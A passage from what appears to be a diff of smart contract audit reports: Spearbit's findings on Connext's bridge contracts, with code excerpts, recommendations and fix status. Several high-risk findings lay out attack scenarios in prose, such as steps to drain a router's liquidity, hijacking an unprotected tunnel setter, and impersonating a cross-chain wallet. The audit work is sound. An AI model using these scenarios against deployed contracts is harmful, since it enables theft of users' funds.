Solved in PR 1653. Spearbit: Verified. +5.6.8 Consistently delete array entries in PromiseRouter Severity: Informational Context: PromiseRouter.sol#L226-L258 Description: In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same it better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... } Recommendation: Consider changing the code to: -callbackFees[transferId] = 0; +delete callbackFees[transferId]; Connext: Solved in PR 1652. Spearbit: Verified. 40 +5.6.9 getTokenPrice() will revert if setDirectPrice() is set in the future Severity: Low Risk Context: ConnextPriceOracle.sol#L195-L214, ConnextPriceOracle.sol#L88-L107 Description: The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect. Recommendation: Consider checking for this behaviour or instead prevent the admin from setting the price timestamp in the future. Connext: Solved in PR 1646. Spearbit: Verified. +5.6.10 Roundup in words not optimal Severity: Informational Context: Connext copy of TypedMemView.sol#L424-L426, TypedMemView.sol#L380-L387 Description: The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice * @param memView * @return */ The number of memory words this memory view occupies, rounded up. The view uint256 - The number of memory words function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; } Recommendation: The code should most likely be: -return uint256(len(memView)).add(32) / 32; +return uint256(len(memView)).add(31) / 32; Connext: Solved in PR 1625. Alerted the Nomad team to the problem. Spearbit: Verified (for the Connext copy). Acknowledged (for the alert to Nomad). +5.6.11 callback could have capped returnData Severity: Informational Context: Executor.sol#L142-L243, PromiseRouter.sol#L226-L258 Description: The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_- COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped and this fact is not clearly documented. 41 function execute(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... ,! } Recommendation: Document that the execute() function can have capped returnData, and that the callback() can receive chopped off data which might be interpreted in the wrong way. Connext: Solved in PR 1670. Spearbit: Verified. +5.6.12 Several external functions are not nonReentrant Severity: Informational Context: BridgeFacet.sol#L380-L386, PortalFacet.sol#L80-L167, RelayerFacet.sol#L130-L153 Description: The following functions don’t have nonReentrant, while most other external functions do have such modifier. • bumpTransfer of BridgeFacet. • forceReceiveLocal of BridgeFacet. • repayAavePortal of PortalFacet. • repayAavePortalFor of PortalFacet. • initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet imple- mented). A lot of the aggregators use the difference between pre-swap balance and post-swap balance. (e.g. uniswap v3 router , 1inch, etc.. ). While this isn’t exploitable yet, there is a chance that future updates might open up an issue to exploit. Recommendation: Consider adding nonReentrant on every functions that absorbs tokens/ value. Double check all other function to see if nonReentrant is useful. Connext: Solved in PR 1611. Spearbit: Verified. 42 +5.6.13 NomadFacet.reconcile() has an unused argument canonicalDomain Severity: Informational Context: NomadFacet.sol#L122 Description: NomadFacet.reconcile() has an unused argument canonicalDomain. Recommendation: Consider implementing one of the following: • Comment the argument to explicitly mark that it’s not used. • This issue will be resolved if the recommendation of issue titled "Canonical assets should be keyed on the hash of domain and id" is followed. Connext: Solved in PR 1523. Note: the PR was created to address the finalized update to the nomad BridgeRouter. Spearbit: Verified. Note: The BridgeRouter and its interface has changed quite a lot during and after this audit. It was out of scope for this audit but it is important to have a separate review of that code, including the interface to Connext. +5.6.14 SwapUtils._calculateSwap() returns two values with different precision Severity: Informational Context: SwapUtils.sol#L537-L538 Description: SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore severity is informa- tional. But without documentation it is easy to miss. Recommendation: Consider noting this difference in precision between the return values in the Natspec descrip- tion of _calculateSwap(). Connext: Solved in PR 1624. Spearbit: Verified. +5.6.15 Multicall.sol not compatible with Natspec Severity: Informational Context: Multicall.sol#L5-L17 Description: Multicall.sol Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses a low level call() method which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData); Recommendation: Replace call() with staticcall() and thus preventing state changes. Connext: Solved in PR 1612. Spearbit: Verified. 43 +5.6.16 reimburseRelayerFees only what is necessary Severity: Informational Context: SponsorVault.sol#L235-L271 Description: The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance relayerFeeCap is sufficient. So if a receiver already has a balance only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... } Recommendation: Consider changing the code as suggested below: -sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; + uint256 missingFee = relayerFeeCap - _to.balance; // already checked _to.balance <= relayerFeeCap +sponsoredFee = sponsoredFee >= missingFee ? missingFee : sponsoredFee; Connext: Solved in PR 1613. Spearbit: Verified. +5.6.17 safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _recon- cileProcessPortal Severity: Informational Context: NomadFacet.sol#L236-L237 NomadFacet.sol#L222-L223 It uses safeDe- Description: The NomadFacet uses safeIncreaseAllowance after clearing the allowance. creaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that SafeApprove has been deprecated for the concern of a front-running attack. It is only supported when setting an initial allowance or setting the allowance to zero SafeERC20.sol#L38 Recommendation: Use safeApprove instead. Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding in the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out of band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code. Spearbit: Verified. 44 +5.6.18 Event not emitted when ERC20 and native asset is transferred together to SponsorVault Severity: Informational Context: SponsorVault.sol#L279-L285 Description: Any ERC20 token or native asset can be transferred to SponsorVault contract by calling the de- posit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call only a single event corresponding to the ERC20 transfer is emitted. Recommendation: Consider having these functions to handle ERC20 transfer and native asset transfer sepa- rately. function deposit(address _token, uint256 _amount) external { IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); emit Deposit(_token, _amount, msg.sender); } function depositNative() external payable { emit Deposit(address(0), msg.value, msg.sender); } Connext: Solved in PR 1614. Spearbit: Verified. +5.6.19 payable keyword can be removed Severity: Informational Context: StableSwapFacet.sol#L249, StableSwapFacet.sol#L273 Description: If a function does not need to have the native asset sent to it it is recommended to not mark it as payable and avoid any funds getting. StableSwapFacet.sol has two payable functions: swapExact() and swapExactOut, which only swap ERC20 tokens and are not expected to receive the native asset. Recommendation: Remove payable keyword for swapExact() and swapExactOut(). Connext: Solved in PR 1615. Spearbit: Verified. +5.6.20 Improve variable naming Severity: Informational Context: LibCrossDomainProperty.sol#L37, BridgeFacet.sol#L240-L339, BridgeFacet.sol#L644-L688 BaseConnextFacet.sol#L87-L95, LibConnextStorage.sol#L244-L248, BaseConnextFacet.sol#L17, Description: Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning as they actually refer to the ownership whitelist being renounced. 45 function _isRouterOwnershipRenounced() internal view returns (bool) { return LibDiamond.contractOwner() == address(0) || s._routerOwnershipRenounced; } /** * @notice Indicates if the ownership of the asset whitelist has * been renounced */ function _isAssetOwnershipRenounced() internal view returns (bool) { ... bool _routerOwnershipRenounced; ... // 27 bool _assetOwnershipRenounced; The constant EMPTY is defined twice with different values. This is confusing and could lead to errors. contract BaseConnextFacet { ... bytes32 internal constant EMPTY = hex"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470"; ... ,! } library LibCrossDomainProperty { ... bytes29 public constant EMPTY = hex"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"; ... } The function xcall() uses both _args.transactingAssetId and transactingAssetId. two, but they each have a very specific meaning and missing it introduces problems. It is easy to mix these function xcall(...) ... { ... address transactingAssetId = _args.transactingAssetId == address(0) ? address(s.wrapper) : _args.transactingAssetId; ... (, uint256 amount) = AssetLogic.handleIncomingAsset( _args.transactingAssetId, ... ); ... (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( ..., transactingAssetId, ... ); ... } In the _handleExecuteTransaction function of BridgeFacet, _args.amount and _amount are used. In this func- tion: • _args.amount is equal to bridged_amount; 46 • _amount is equal to bridged_amount - liquidityFee (and potentially swapped amount). Recommendation: Rename the variables/functions to improve comprehension. Connext: Solved in PR 1608 and PR 1629. Spearbit: Verified. +5.6.21 onlyRemoteRouter can be circumvented Severity: Informational Context: Router.sol#L56-L58, BridgeRouter.sol#L112-L117, Replica.sol#L179-L204 The Code4rena contest suggested a modification Code4arena-254 that was fixed in Description: BaseConnextFacet-fix. However, the change has not been applied to Router.sol#L56-L58 which is currently in use. The modifier onlyRemoteRouter() can be mislead if the sender parameter has the value 0. The modifier uses _m.sender() from the received message by Nomad. Assuming all checks of Nomad work as expected this value cannot be 0 as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), "!proven"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), "!remote router"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } } Recommendation: To be extra careful, consider applying the changes also to Router.sol: 47 function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return s.remotes[_domain] == _router && _router != bytes32(0); } Connext: Solved in PR 1616. Spearbit: Verified. +5.6.22 Some dust not accounted for in reconcile() Severity: Informational Context: BridgeFacet.sol#L571-L628, NomadFacet.sol#L118-L165 Description: The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet() does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity. uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder ,! dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } } Recommendation: Consider giving the last router the remaining tokens (dust) in function reconcile(). Alterna- tively add a comment that some dust tokens are neglected. Connext: Solved in PR 1617. Spearbit: Verified. 48 +5.6.23 Careful with the decimals of BridgeTokens Severity: Informational Context: SwapAdminFacet.sol#L107-L175 BridgeRouter.sol#L226-L334, BridgeToken.sol#L93-L119, initializeSwap.ts#L109-L110 Description: The BridgeRouter sends token details including the decimals() over the nomad bridge to configure a new deployed token. After setting the hash with setDetailsHash() anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces so it might not be a large problem when the setDetails() is executed at later point in time. However initializeSwap() also uses decimals(), this is called via offchain code. In the example code of initializeSwap.ts it retrieves the decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts, depending on which is executed first, the swaps will have different results. Note: It could also break the ConnextPriceOracle contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, "!committed details" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts 49 const decimals = await Promise.all([ (await ethers.getContractAt("TestERC20", local)).decimals(), (await ethers.getContractAt("TestERC20", adopted)).decimals(), // setDetails might not have ,! been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ... } } } Recommendation: Set the decimals of the deployed token on the destination chain in a deterministic way. Or use the token decimals on the origination chain when calling initializeSwap(), and adapt example code to prevent mistakes. Connext: Will be solved in deployment scripts. This PR adds a comment to the test deployment scripts: PR 1627. Spearbit: Acknowledged. +5.6.24 Incorrect comment about ERC20 approval to zero-address Severity: Informational Context: AssetLogic.sol#L289-L290 Description: The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesn’t have this restriction and ERC20 tokens based on solmate also don’t revert on approving to zero-address. There is no risk here as the following line of code for zero-address pools will revert. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); Recommendation: Update the comments. Connext: Solved in PR 1618. Spearbit: Verified. 50 +5.6.25 Native asset is delivered even if the wrapped asset is transferred Severity: Informational Context: BridgeFacet.sol#L292-L293, AssetLogic.sol#L75-L80, AssetLogic.sol#L140-L145 Description: Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... Recommendation: Consider removing the capability of transferring native asset through Connext. Users can transfer wrapped assets, and the wrapping and unwrapping can happen outside the Connext system. This simpli- fies the code by removing a few branches to handle native assets and wrapped assets differently from the usual ERC20 tokens. Connext: Removed native asset handling in PR 1641. Spearbit: Verified. +5.6.26 Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance Severity: Informational Context: BridgeFacet.sol#L601-L608 Description: If the router picked by the Sequencer doesn’t have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers since there is a limit on the total maximum amount that can be borrowed. Recommendation: Borrow the difference between the transfer amount and router’s balance. Connext: I think keeping the original code is likely best, closing the PR! Spearbit: Acknowledged (the code would indeed get far more complicated trying to solve this). +5.6.27 Unused variable Severity: Informational Context: BridgeFacet.sol#L265 Description: The variable message is not used after declaration. bytes memory message; Recommendation: Remove this variable declaration. Connext: Solved in PR 1523. Spearbit: Verified. 51 +5.6.28 Incorrect Natspec for adopted and canonical asset mappings Severity: Informational Context: LibConnextStorage.sol#L172-L184 Description: adoptedToCanonical maps adopted assets to canonical assets, but is described as a "Mapping of canonical to adopted assets"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a "Mapping of adopted to canonical assets". // /** // * @notice Mapping of canonical to adopted assets on this domain // * @dev If the adopted asset is the native asset, the keyed address will // * be the wrapped asset address // */ // 12 mapping(address => TokenId) adoptedToCanonical; // /** // * @notice Mapping of adopted to canonical on this domain // * @dev If the adopted asset is the native asset, the stored address will be the // * wrapped asset address // */ // 13 mapping(bytes32 => address) canonicalToAdopted; Recommendation: Update the Natspec comment to correctly describe the variables. Connext: Solved in PR 1588. Spearbit: Verified. +5.6.29 Use of SafeMath for solc >= 0.8 Severity: Informational Context: AmplificationUtils.sol#L5-L16, SwapUtils.sol#L4-L21, ConnextPriceOracle.sol#L45, GovernanceR- outer.sol#L20 Description: AmplificationUtils, SwapUtils, ConnextPriceOracle, GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in solidity reverts if it overflows or underflows, hence there is no need to use open- zeppelin’s SafeMath library. Recommendation: Remove SafeMath as a dependency and use vanilla arithmetic operators. Connext: Solved in PR 1619. GovernanceRouter.sol is a Nomad contract, so will be handled by Nomad team. Spearbit: Verified and acknowledged. 52 6 Appendix: Contract architecture overview 53 diff --git a/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt new file mode 100644 index 0000000..dd593ba --- /dev/null +++ b/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt @@ -0,0 +1,214 @@ +5.1.1 swapInternal() shouldn't use msg.sender Severity: High Risk Context: • BridgeFacet.sol#L337-L369 • BridgeFacet.sol#L659-L750 • AssetLogic.sol#L150-L182 • AssetLogic.sol#L229-L262 • SwapUtils.sol#L798-L826 Description: As reported by the Connext team, the internal stable swap checks if msg.sender has sufficient funds on execute(). This msg.sender is the relayer which normally wouldn't have these funds so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function _handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(... ) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), "more than you own"); ... } // msg.sender is the relayer Recommendation: Don't use the balance of msg.sender. Connext: Solved in PR 2120. Spearbit: Verified. 8 +5.1.2 MERKLE.insert does not return the updated tree leaf count Severity: High Risk Context: Merkle.sol#L74 Description: The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true. If the updated count is 2k (2n + 1) where k , n 2 N [ 0 then the return value would be 2n + 1. Currently, the returned value of insert is not being used, otherwise, this could be a bigger issue. Recommendation: Cache tree.count + 1 in another variable and return that or do not modify size while insert- ing the new leaf and calculating the new root. Alternatively, modify the return NatSpec comment to indicate the exact value returned. Connext: Solved in PR 2211. Spearbit: Verified. The original function has been removed (with the specific signature). In the new function: function insert(Tree memory tree, bytes32 node) internal pure returns (Tree memory) the returned Tree has the correct leaf count. +5.1.3 PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector Severity: High Risk Context: • FxBaseChildTunnel.sol#L38-L41 • FxBaseRootTunnel.sol#L58-L61 • Connector.sol#L119-L121 • PolygonSpokeConnector.sol#L78-L82 • PolygonHubConnector.sol#L51-L55 Description: PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets de- ployed and its constructor is called, if _mirrorConnector == address(0) then setting the mirrorConnector stor- age variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now since the setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by it and assign their own fxRootTunnel PolygonSpokeConnector (PolygonHubConnector) anyone can call (fxChildTunnel) address (note, fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel Note that (fxChildTunnel) to be set once (non-zero address value) so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMir- rorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector) the following will try to execute: 9 // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert since fxRootTunnel (fxChildTunnel) is already set. Thus if the owner of PolygonSpokeConnec- tor (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing the setMirrorConnector and setFxRootTunnel (fxChildTunnel) endpoints for the owner. PolygonSpokeConnector's Recommendation: Make sure either a non-zero address value of _mirrorConnector is submitted/enforced setFxRootTunnel in (setFxChildTunnel) endpoint to disallow a call from a random user, enabling a select few privileged users to be able to call. (PolygonHubConnector) constructor override the or Connext: Only owner can update now. Solved in PR 2387. Spearbit: Verified. +5.1.4 A malicious owner or user with a Role.Router role can drain a router's liquidity Severity: High Risk Context: • RoutersFacet.sol#L263-L267 • RoutersFacet.sol#L297 • RoutersFacet.sol#L498 • BridgeFacet.sol#L622 Description: A malicious owner or user with Role.Router Role denominated as A in this example, can drain a router's liquidity for a current router (a router that has already been added to the system and might potentially have added big liquidities to some assets). Here is how A can do it (can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens that the router has liquidity and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this connext instance) and any user who has a Role.Router Role with their liquidity. So the setup is not trustless currently. Recommendation: To remove this trust assumption a redesign is required for how routers get integrated into this system. And it starts from here, it would be best to have the function in a form like function addRouter(IRouter 10 router) (renamed setupRouter to addRouter). Where IRouter is an interface that tries to shape some require- ments that the router would need to have. A router: 1. Needs to be able to set its own owner or recipient if required. It might not always be required. 2. Needs to be able to sign transfers and bid for those transfers to a sequencer. 3. If approved for using Aave Portal, it might need to be able to call repayAavePortal. But it is not necessary since anyone can call repayAavePortalFor to repay the fees/debts for this router. 4. Can implement calling to addRouterLiquidity to add liquidity. But it is not necessary since anyone can call addRouterLiquidityFor for this router. 5. If the router does not register an account as its owner (also needs to be implemented in this contract for this new redesign) it needs to implement calling removeRouterLiquidity to remove its liquidity. If it does register an owner, implementing calls to removeRouterLiquidity is not necessary since the router's owner can call removeRouterLiquidityFor. Connext: Solved in PR 2413. Spearbit: Verified. +5.1.5 Users are forced to accept any slippage on the destination chain Severity: High Risk Context: BridgeFacet.sol#L28 Description: The documentation mentioned that there is cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If the high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate. Otherwise, their funds will be stuck in Connext. Recommendation: Implement the cancel function on the destination domain to allow users send funds back to the origin domain if they choose not to accept the high slippage rate on the destination domain. Connext: Solved in PR 2456. Spearbit: Verified. +5.1.6 Preservation of msg.sender in ZkSync could break certain trust assumption Severity: High Risk Context: Any contract deployed on ZkSync that relies on msg.sender Description: For ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), this is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts as the same account/wallet address might be owned by different persons on different chains. This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs. For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2 which allows users to define its salt when deploying the wallet, Bob might use ABC as salt in Ethereum and Alice might use ABC as salt in Zksync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute Hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on ZkSync chain. Alice performs a xcall from Ethereum to ZkSync with delegate set to 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. 11 Bob (attacker) saw that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of the 0xABC by interacting with the wallet factory to deploy a smart contract wallet on the same address on Ethereum. Bob can do so by checking out the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make a L1 -> L2 request by calling the ZKSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is only specific to ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests. Recommendation: Due to the preservation of msg.sender for L1 -> L2 calls in ZkSync chain, any contracts deployed on ZkSync chain that relies on msg.sender for access control should be aware of the possibility that the same address on Ethereum and ZkSync chains might belong to two different owners. This issue will only happen if contract-based accounts are involved. It does not affect EOA as only the owner who has the private key of the EOA can control the EOA on any EVM chain. If Connext plans to support ZkSync, it is recommended that only EOA can interact with ZkSync. Otherwise, add a disclaimer/comment informing the users about the risks and asking them to verify that they have ownership of the address in both Ethereum and ZKSync before proceeding to interact with ZkSync. Connext: Update from zkSync Team: We have a different address generation schema that would not allow ad- dress to be claimed on L2 by an adversary. Even if you deploy same address and same private key it would be different. Spearbit: Acknowledged, since ZkSync L2 is using a different address generation schema as per the ZkSync team, this attack vector will not be possible. +5.1.7 No way to update a Stable Swap once assigned to a key Severity: High Risk Context: SwapAdminFacet.sol#L109 Description: Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for token), it cannot be updated nor deleted. A Swap can be hacked or an improved version may be released which will warrant updating the Swap for a key. Recommendation: Add a privileged removeSwap() function to remove a Swap already assigned to a key. In case a Swap has to be updated, it can be deleted and then initialized. Connext: Solved in PR 2354. Spearbit: Verified. +5.1.8 Renouncing ownership or admin role could affect the normal operation of Connext Severity: High Risk Context: WatcherClient.sol, WatchManager.sol, Merkle.sol, RootManager.sol, ConnextPriceOracle.sol, Upgrade- BeaconController.sol, ProposedOwnableFacet.sol#L276-L285 Description: Consider the following scenarios. • Instance 1 - Renouncing ownership All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. 12 One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved since there is no way to unpause and add the connector back to the system. • Instance 2 - Renouncing admin role All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only Admin remaining used revokeRole to re- nounce its Admin role. 2. Now the contract is left with Zero Owner & Admin. 3. All swap operations collect adminFees via SwapUtils.sol contract. In absence of any Admin & Owner, these fees will get stuck in the contract with no way to retrieve them. Normally it would have been withdrawn using withdrawSwapAdminFees|SwapAdminFacet.sol. 4. This is simply one example, there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles. Recommendation: 1. Review if the renounceOwnership function is required for each of the affected contracts and remove them if they are not needed. Ensure that renouncing ownership in any of the affected contracts will not affect the normal operation of Connext. 2. Revise the revokeRole function to ensure that at least one Admin always remains in the system who will be responsible for managing all critical operations in case the owner renounces the role. Connext: Solved in PR 2412. Spearbit: Verified. +5.1.9 No way of removing Fraudulent Roots Severity: High Risk Context: RootManager.sol#L1 Description: Fraudulent Roots cannot be removed once fraud is detected by the Watcher. This means that Fraud Roots will be propogated to each chain. Recommendation: Create a new method (callable only by Owner) which can be called when the contract is in paused state to remove the offending roots from the queue. Connext: Ideas regarding resolution discussed in Pull Conversation linked with this issue. Spearbit: Verified. 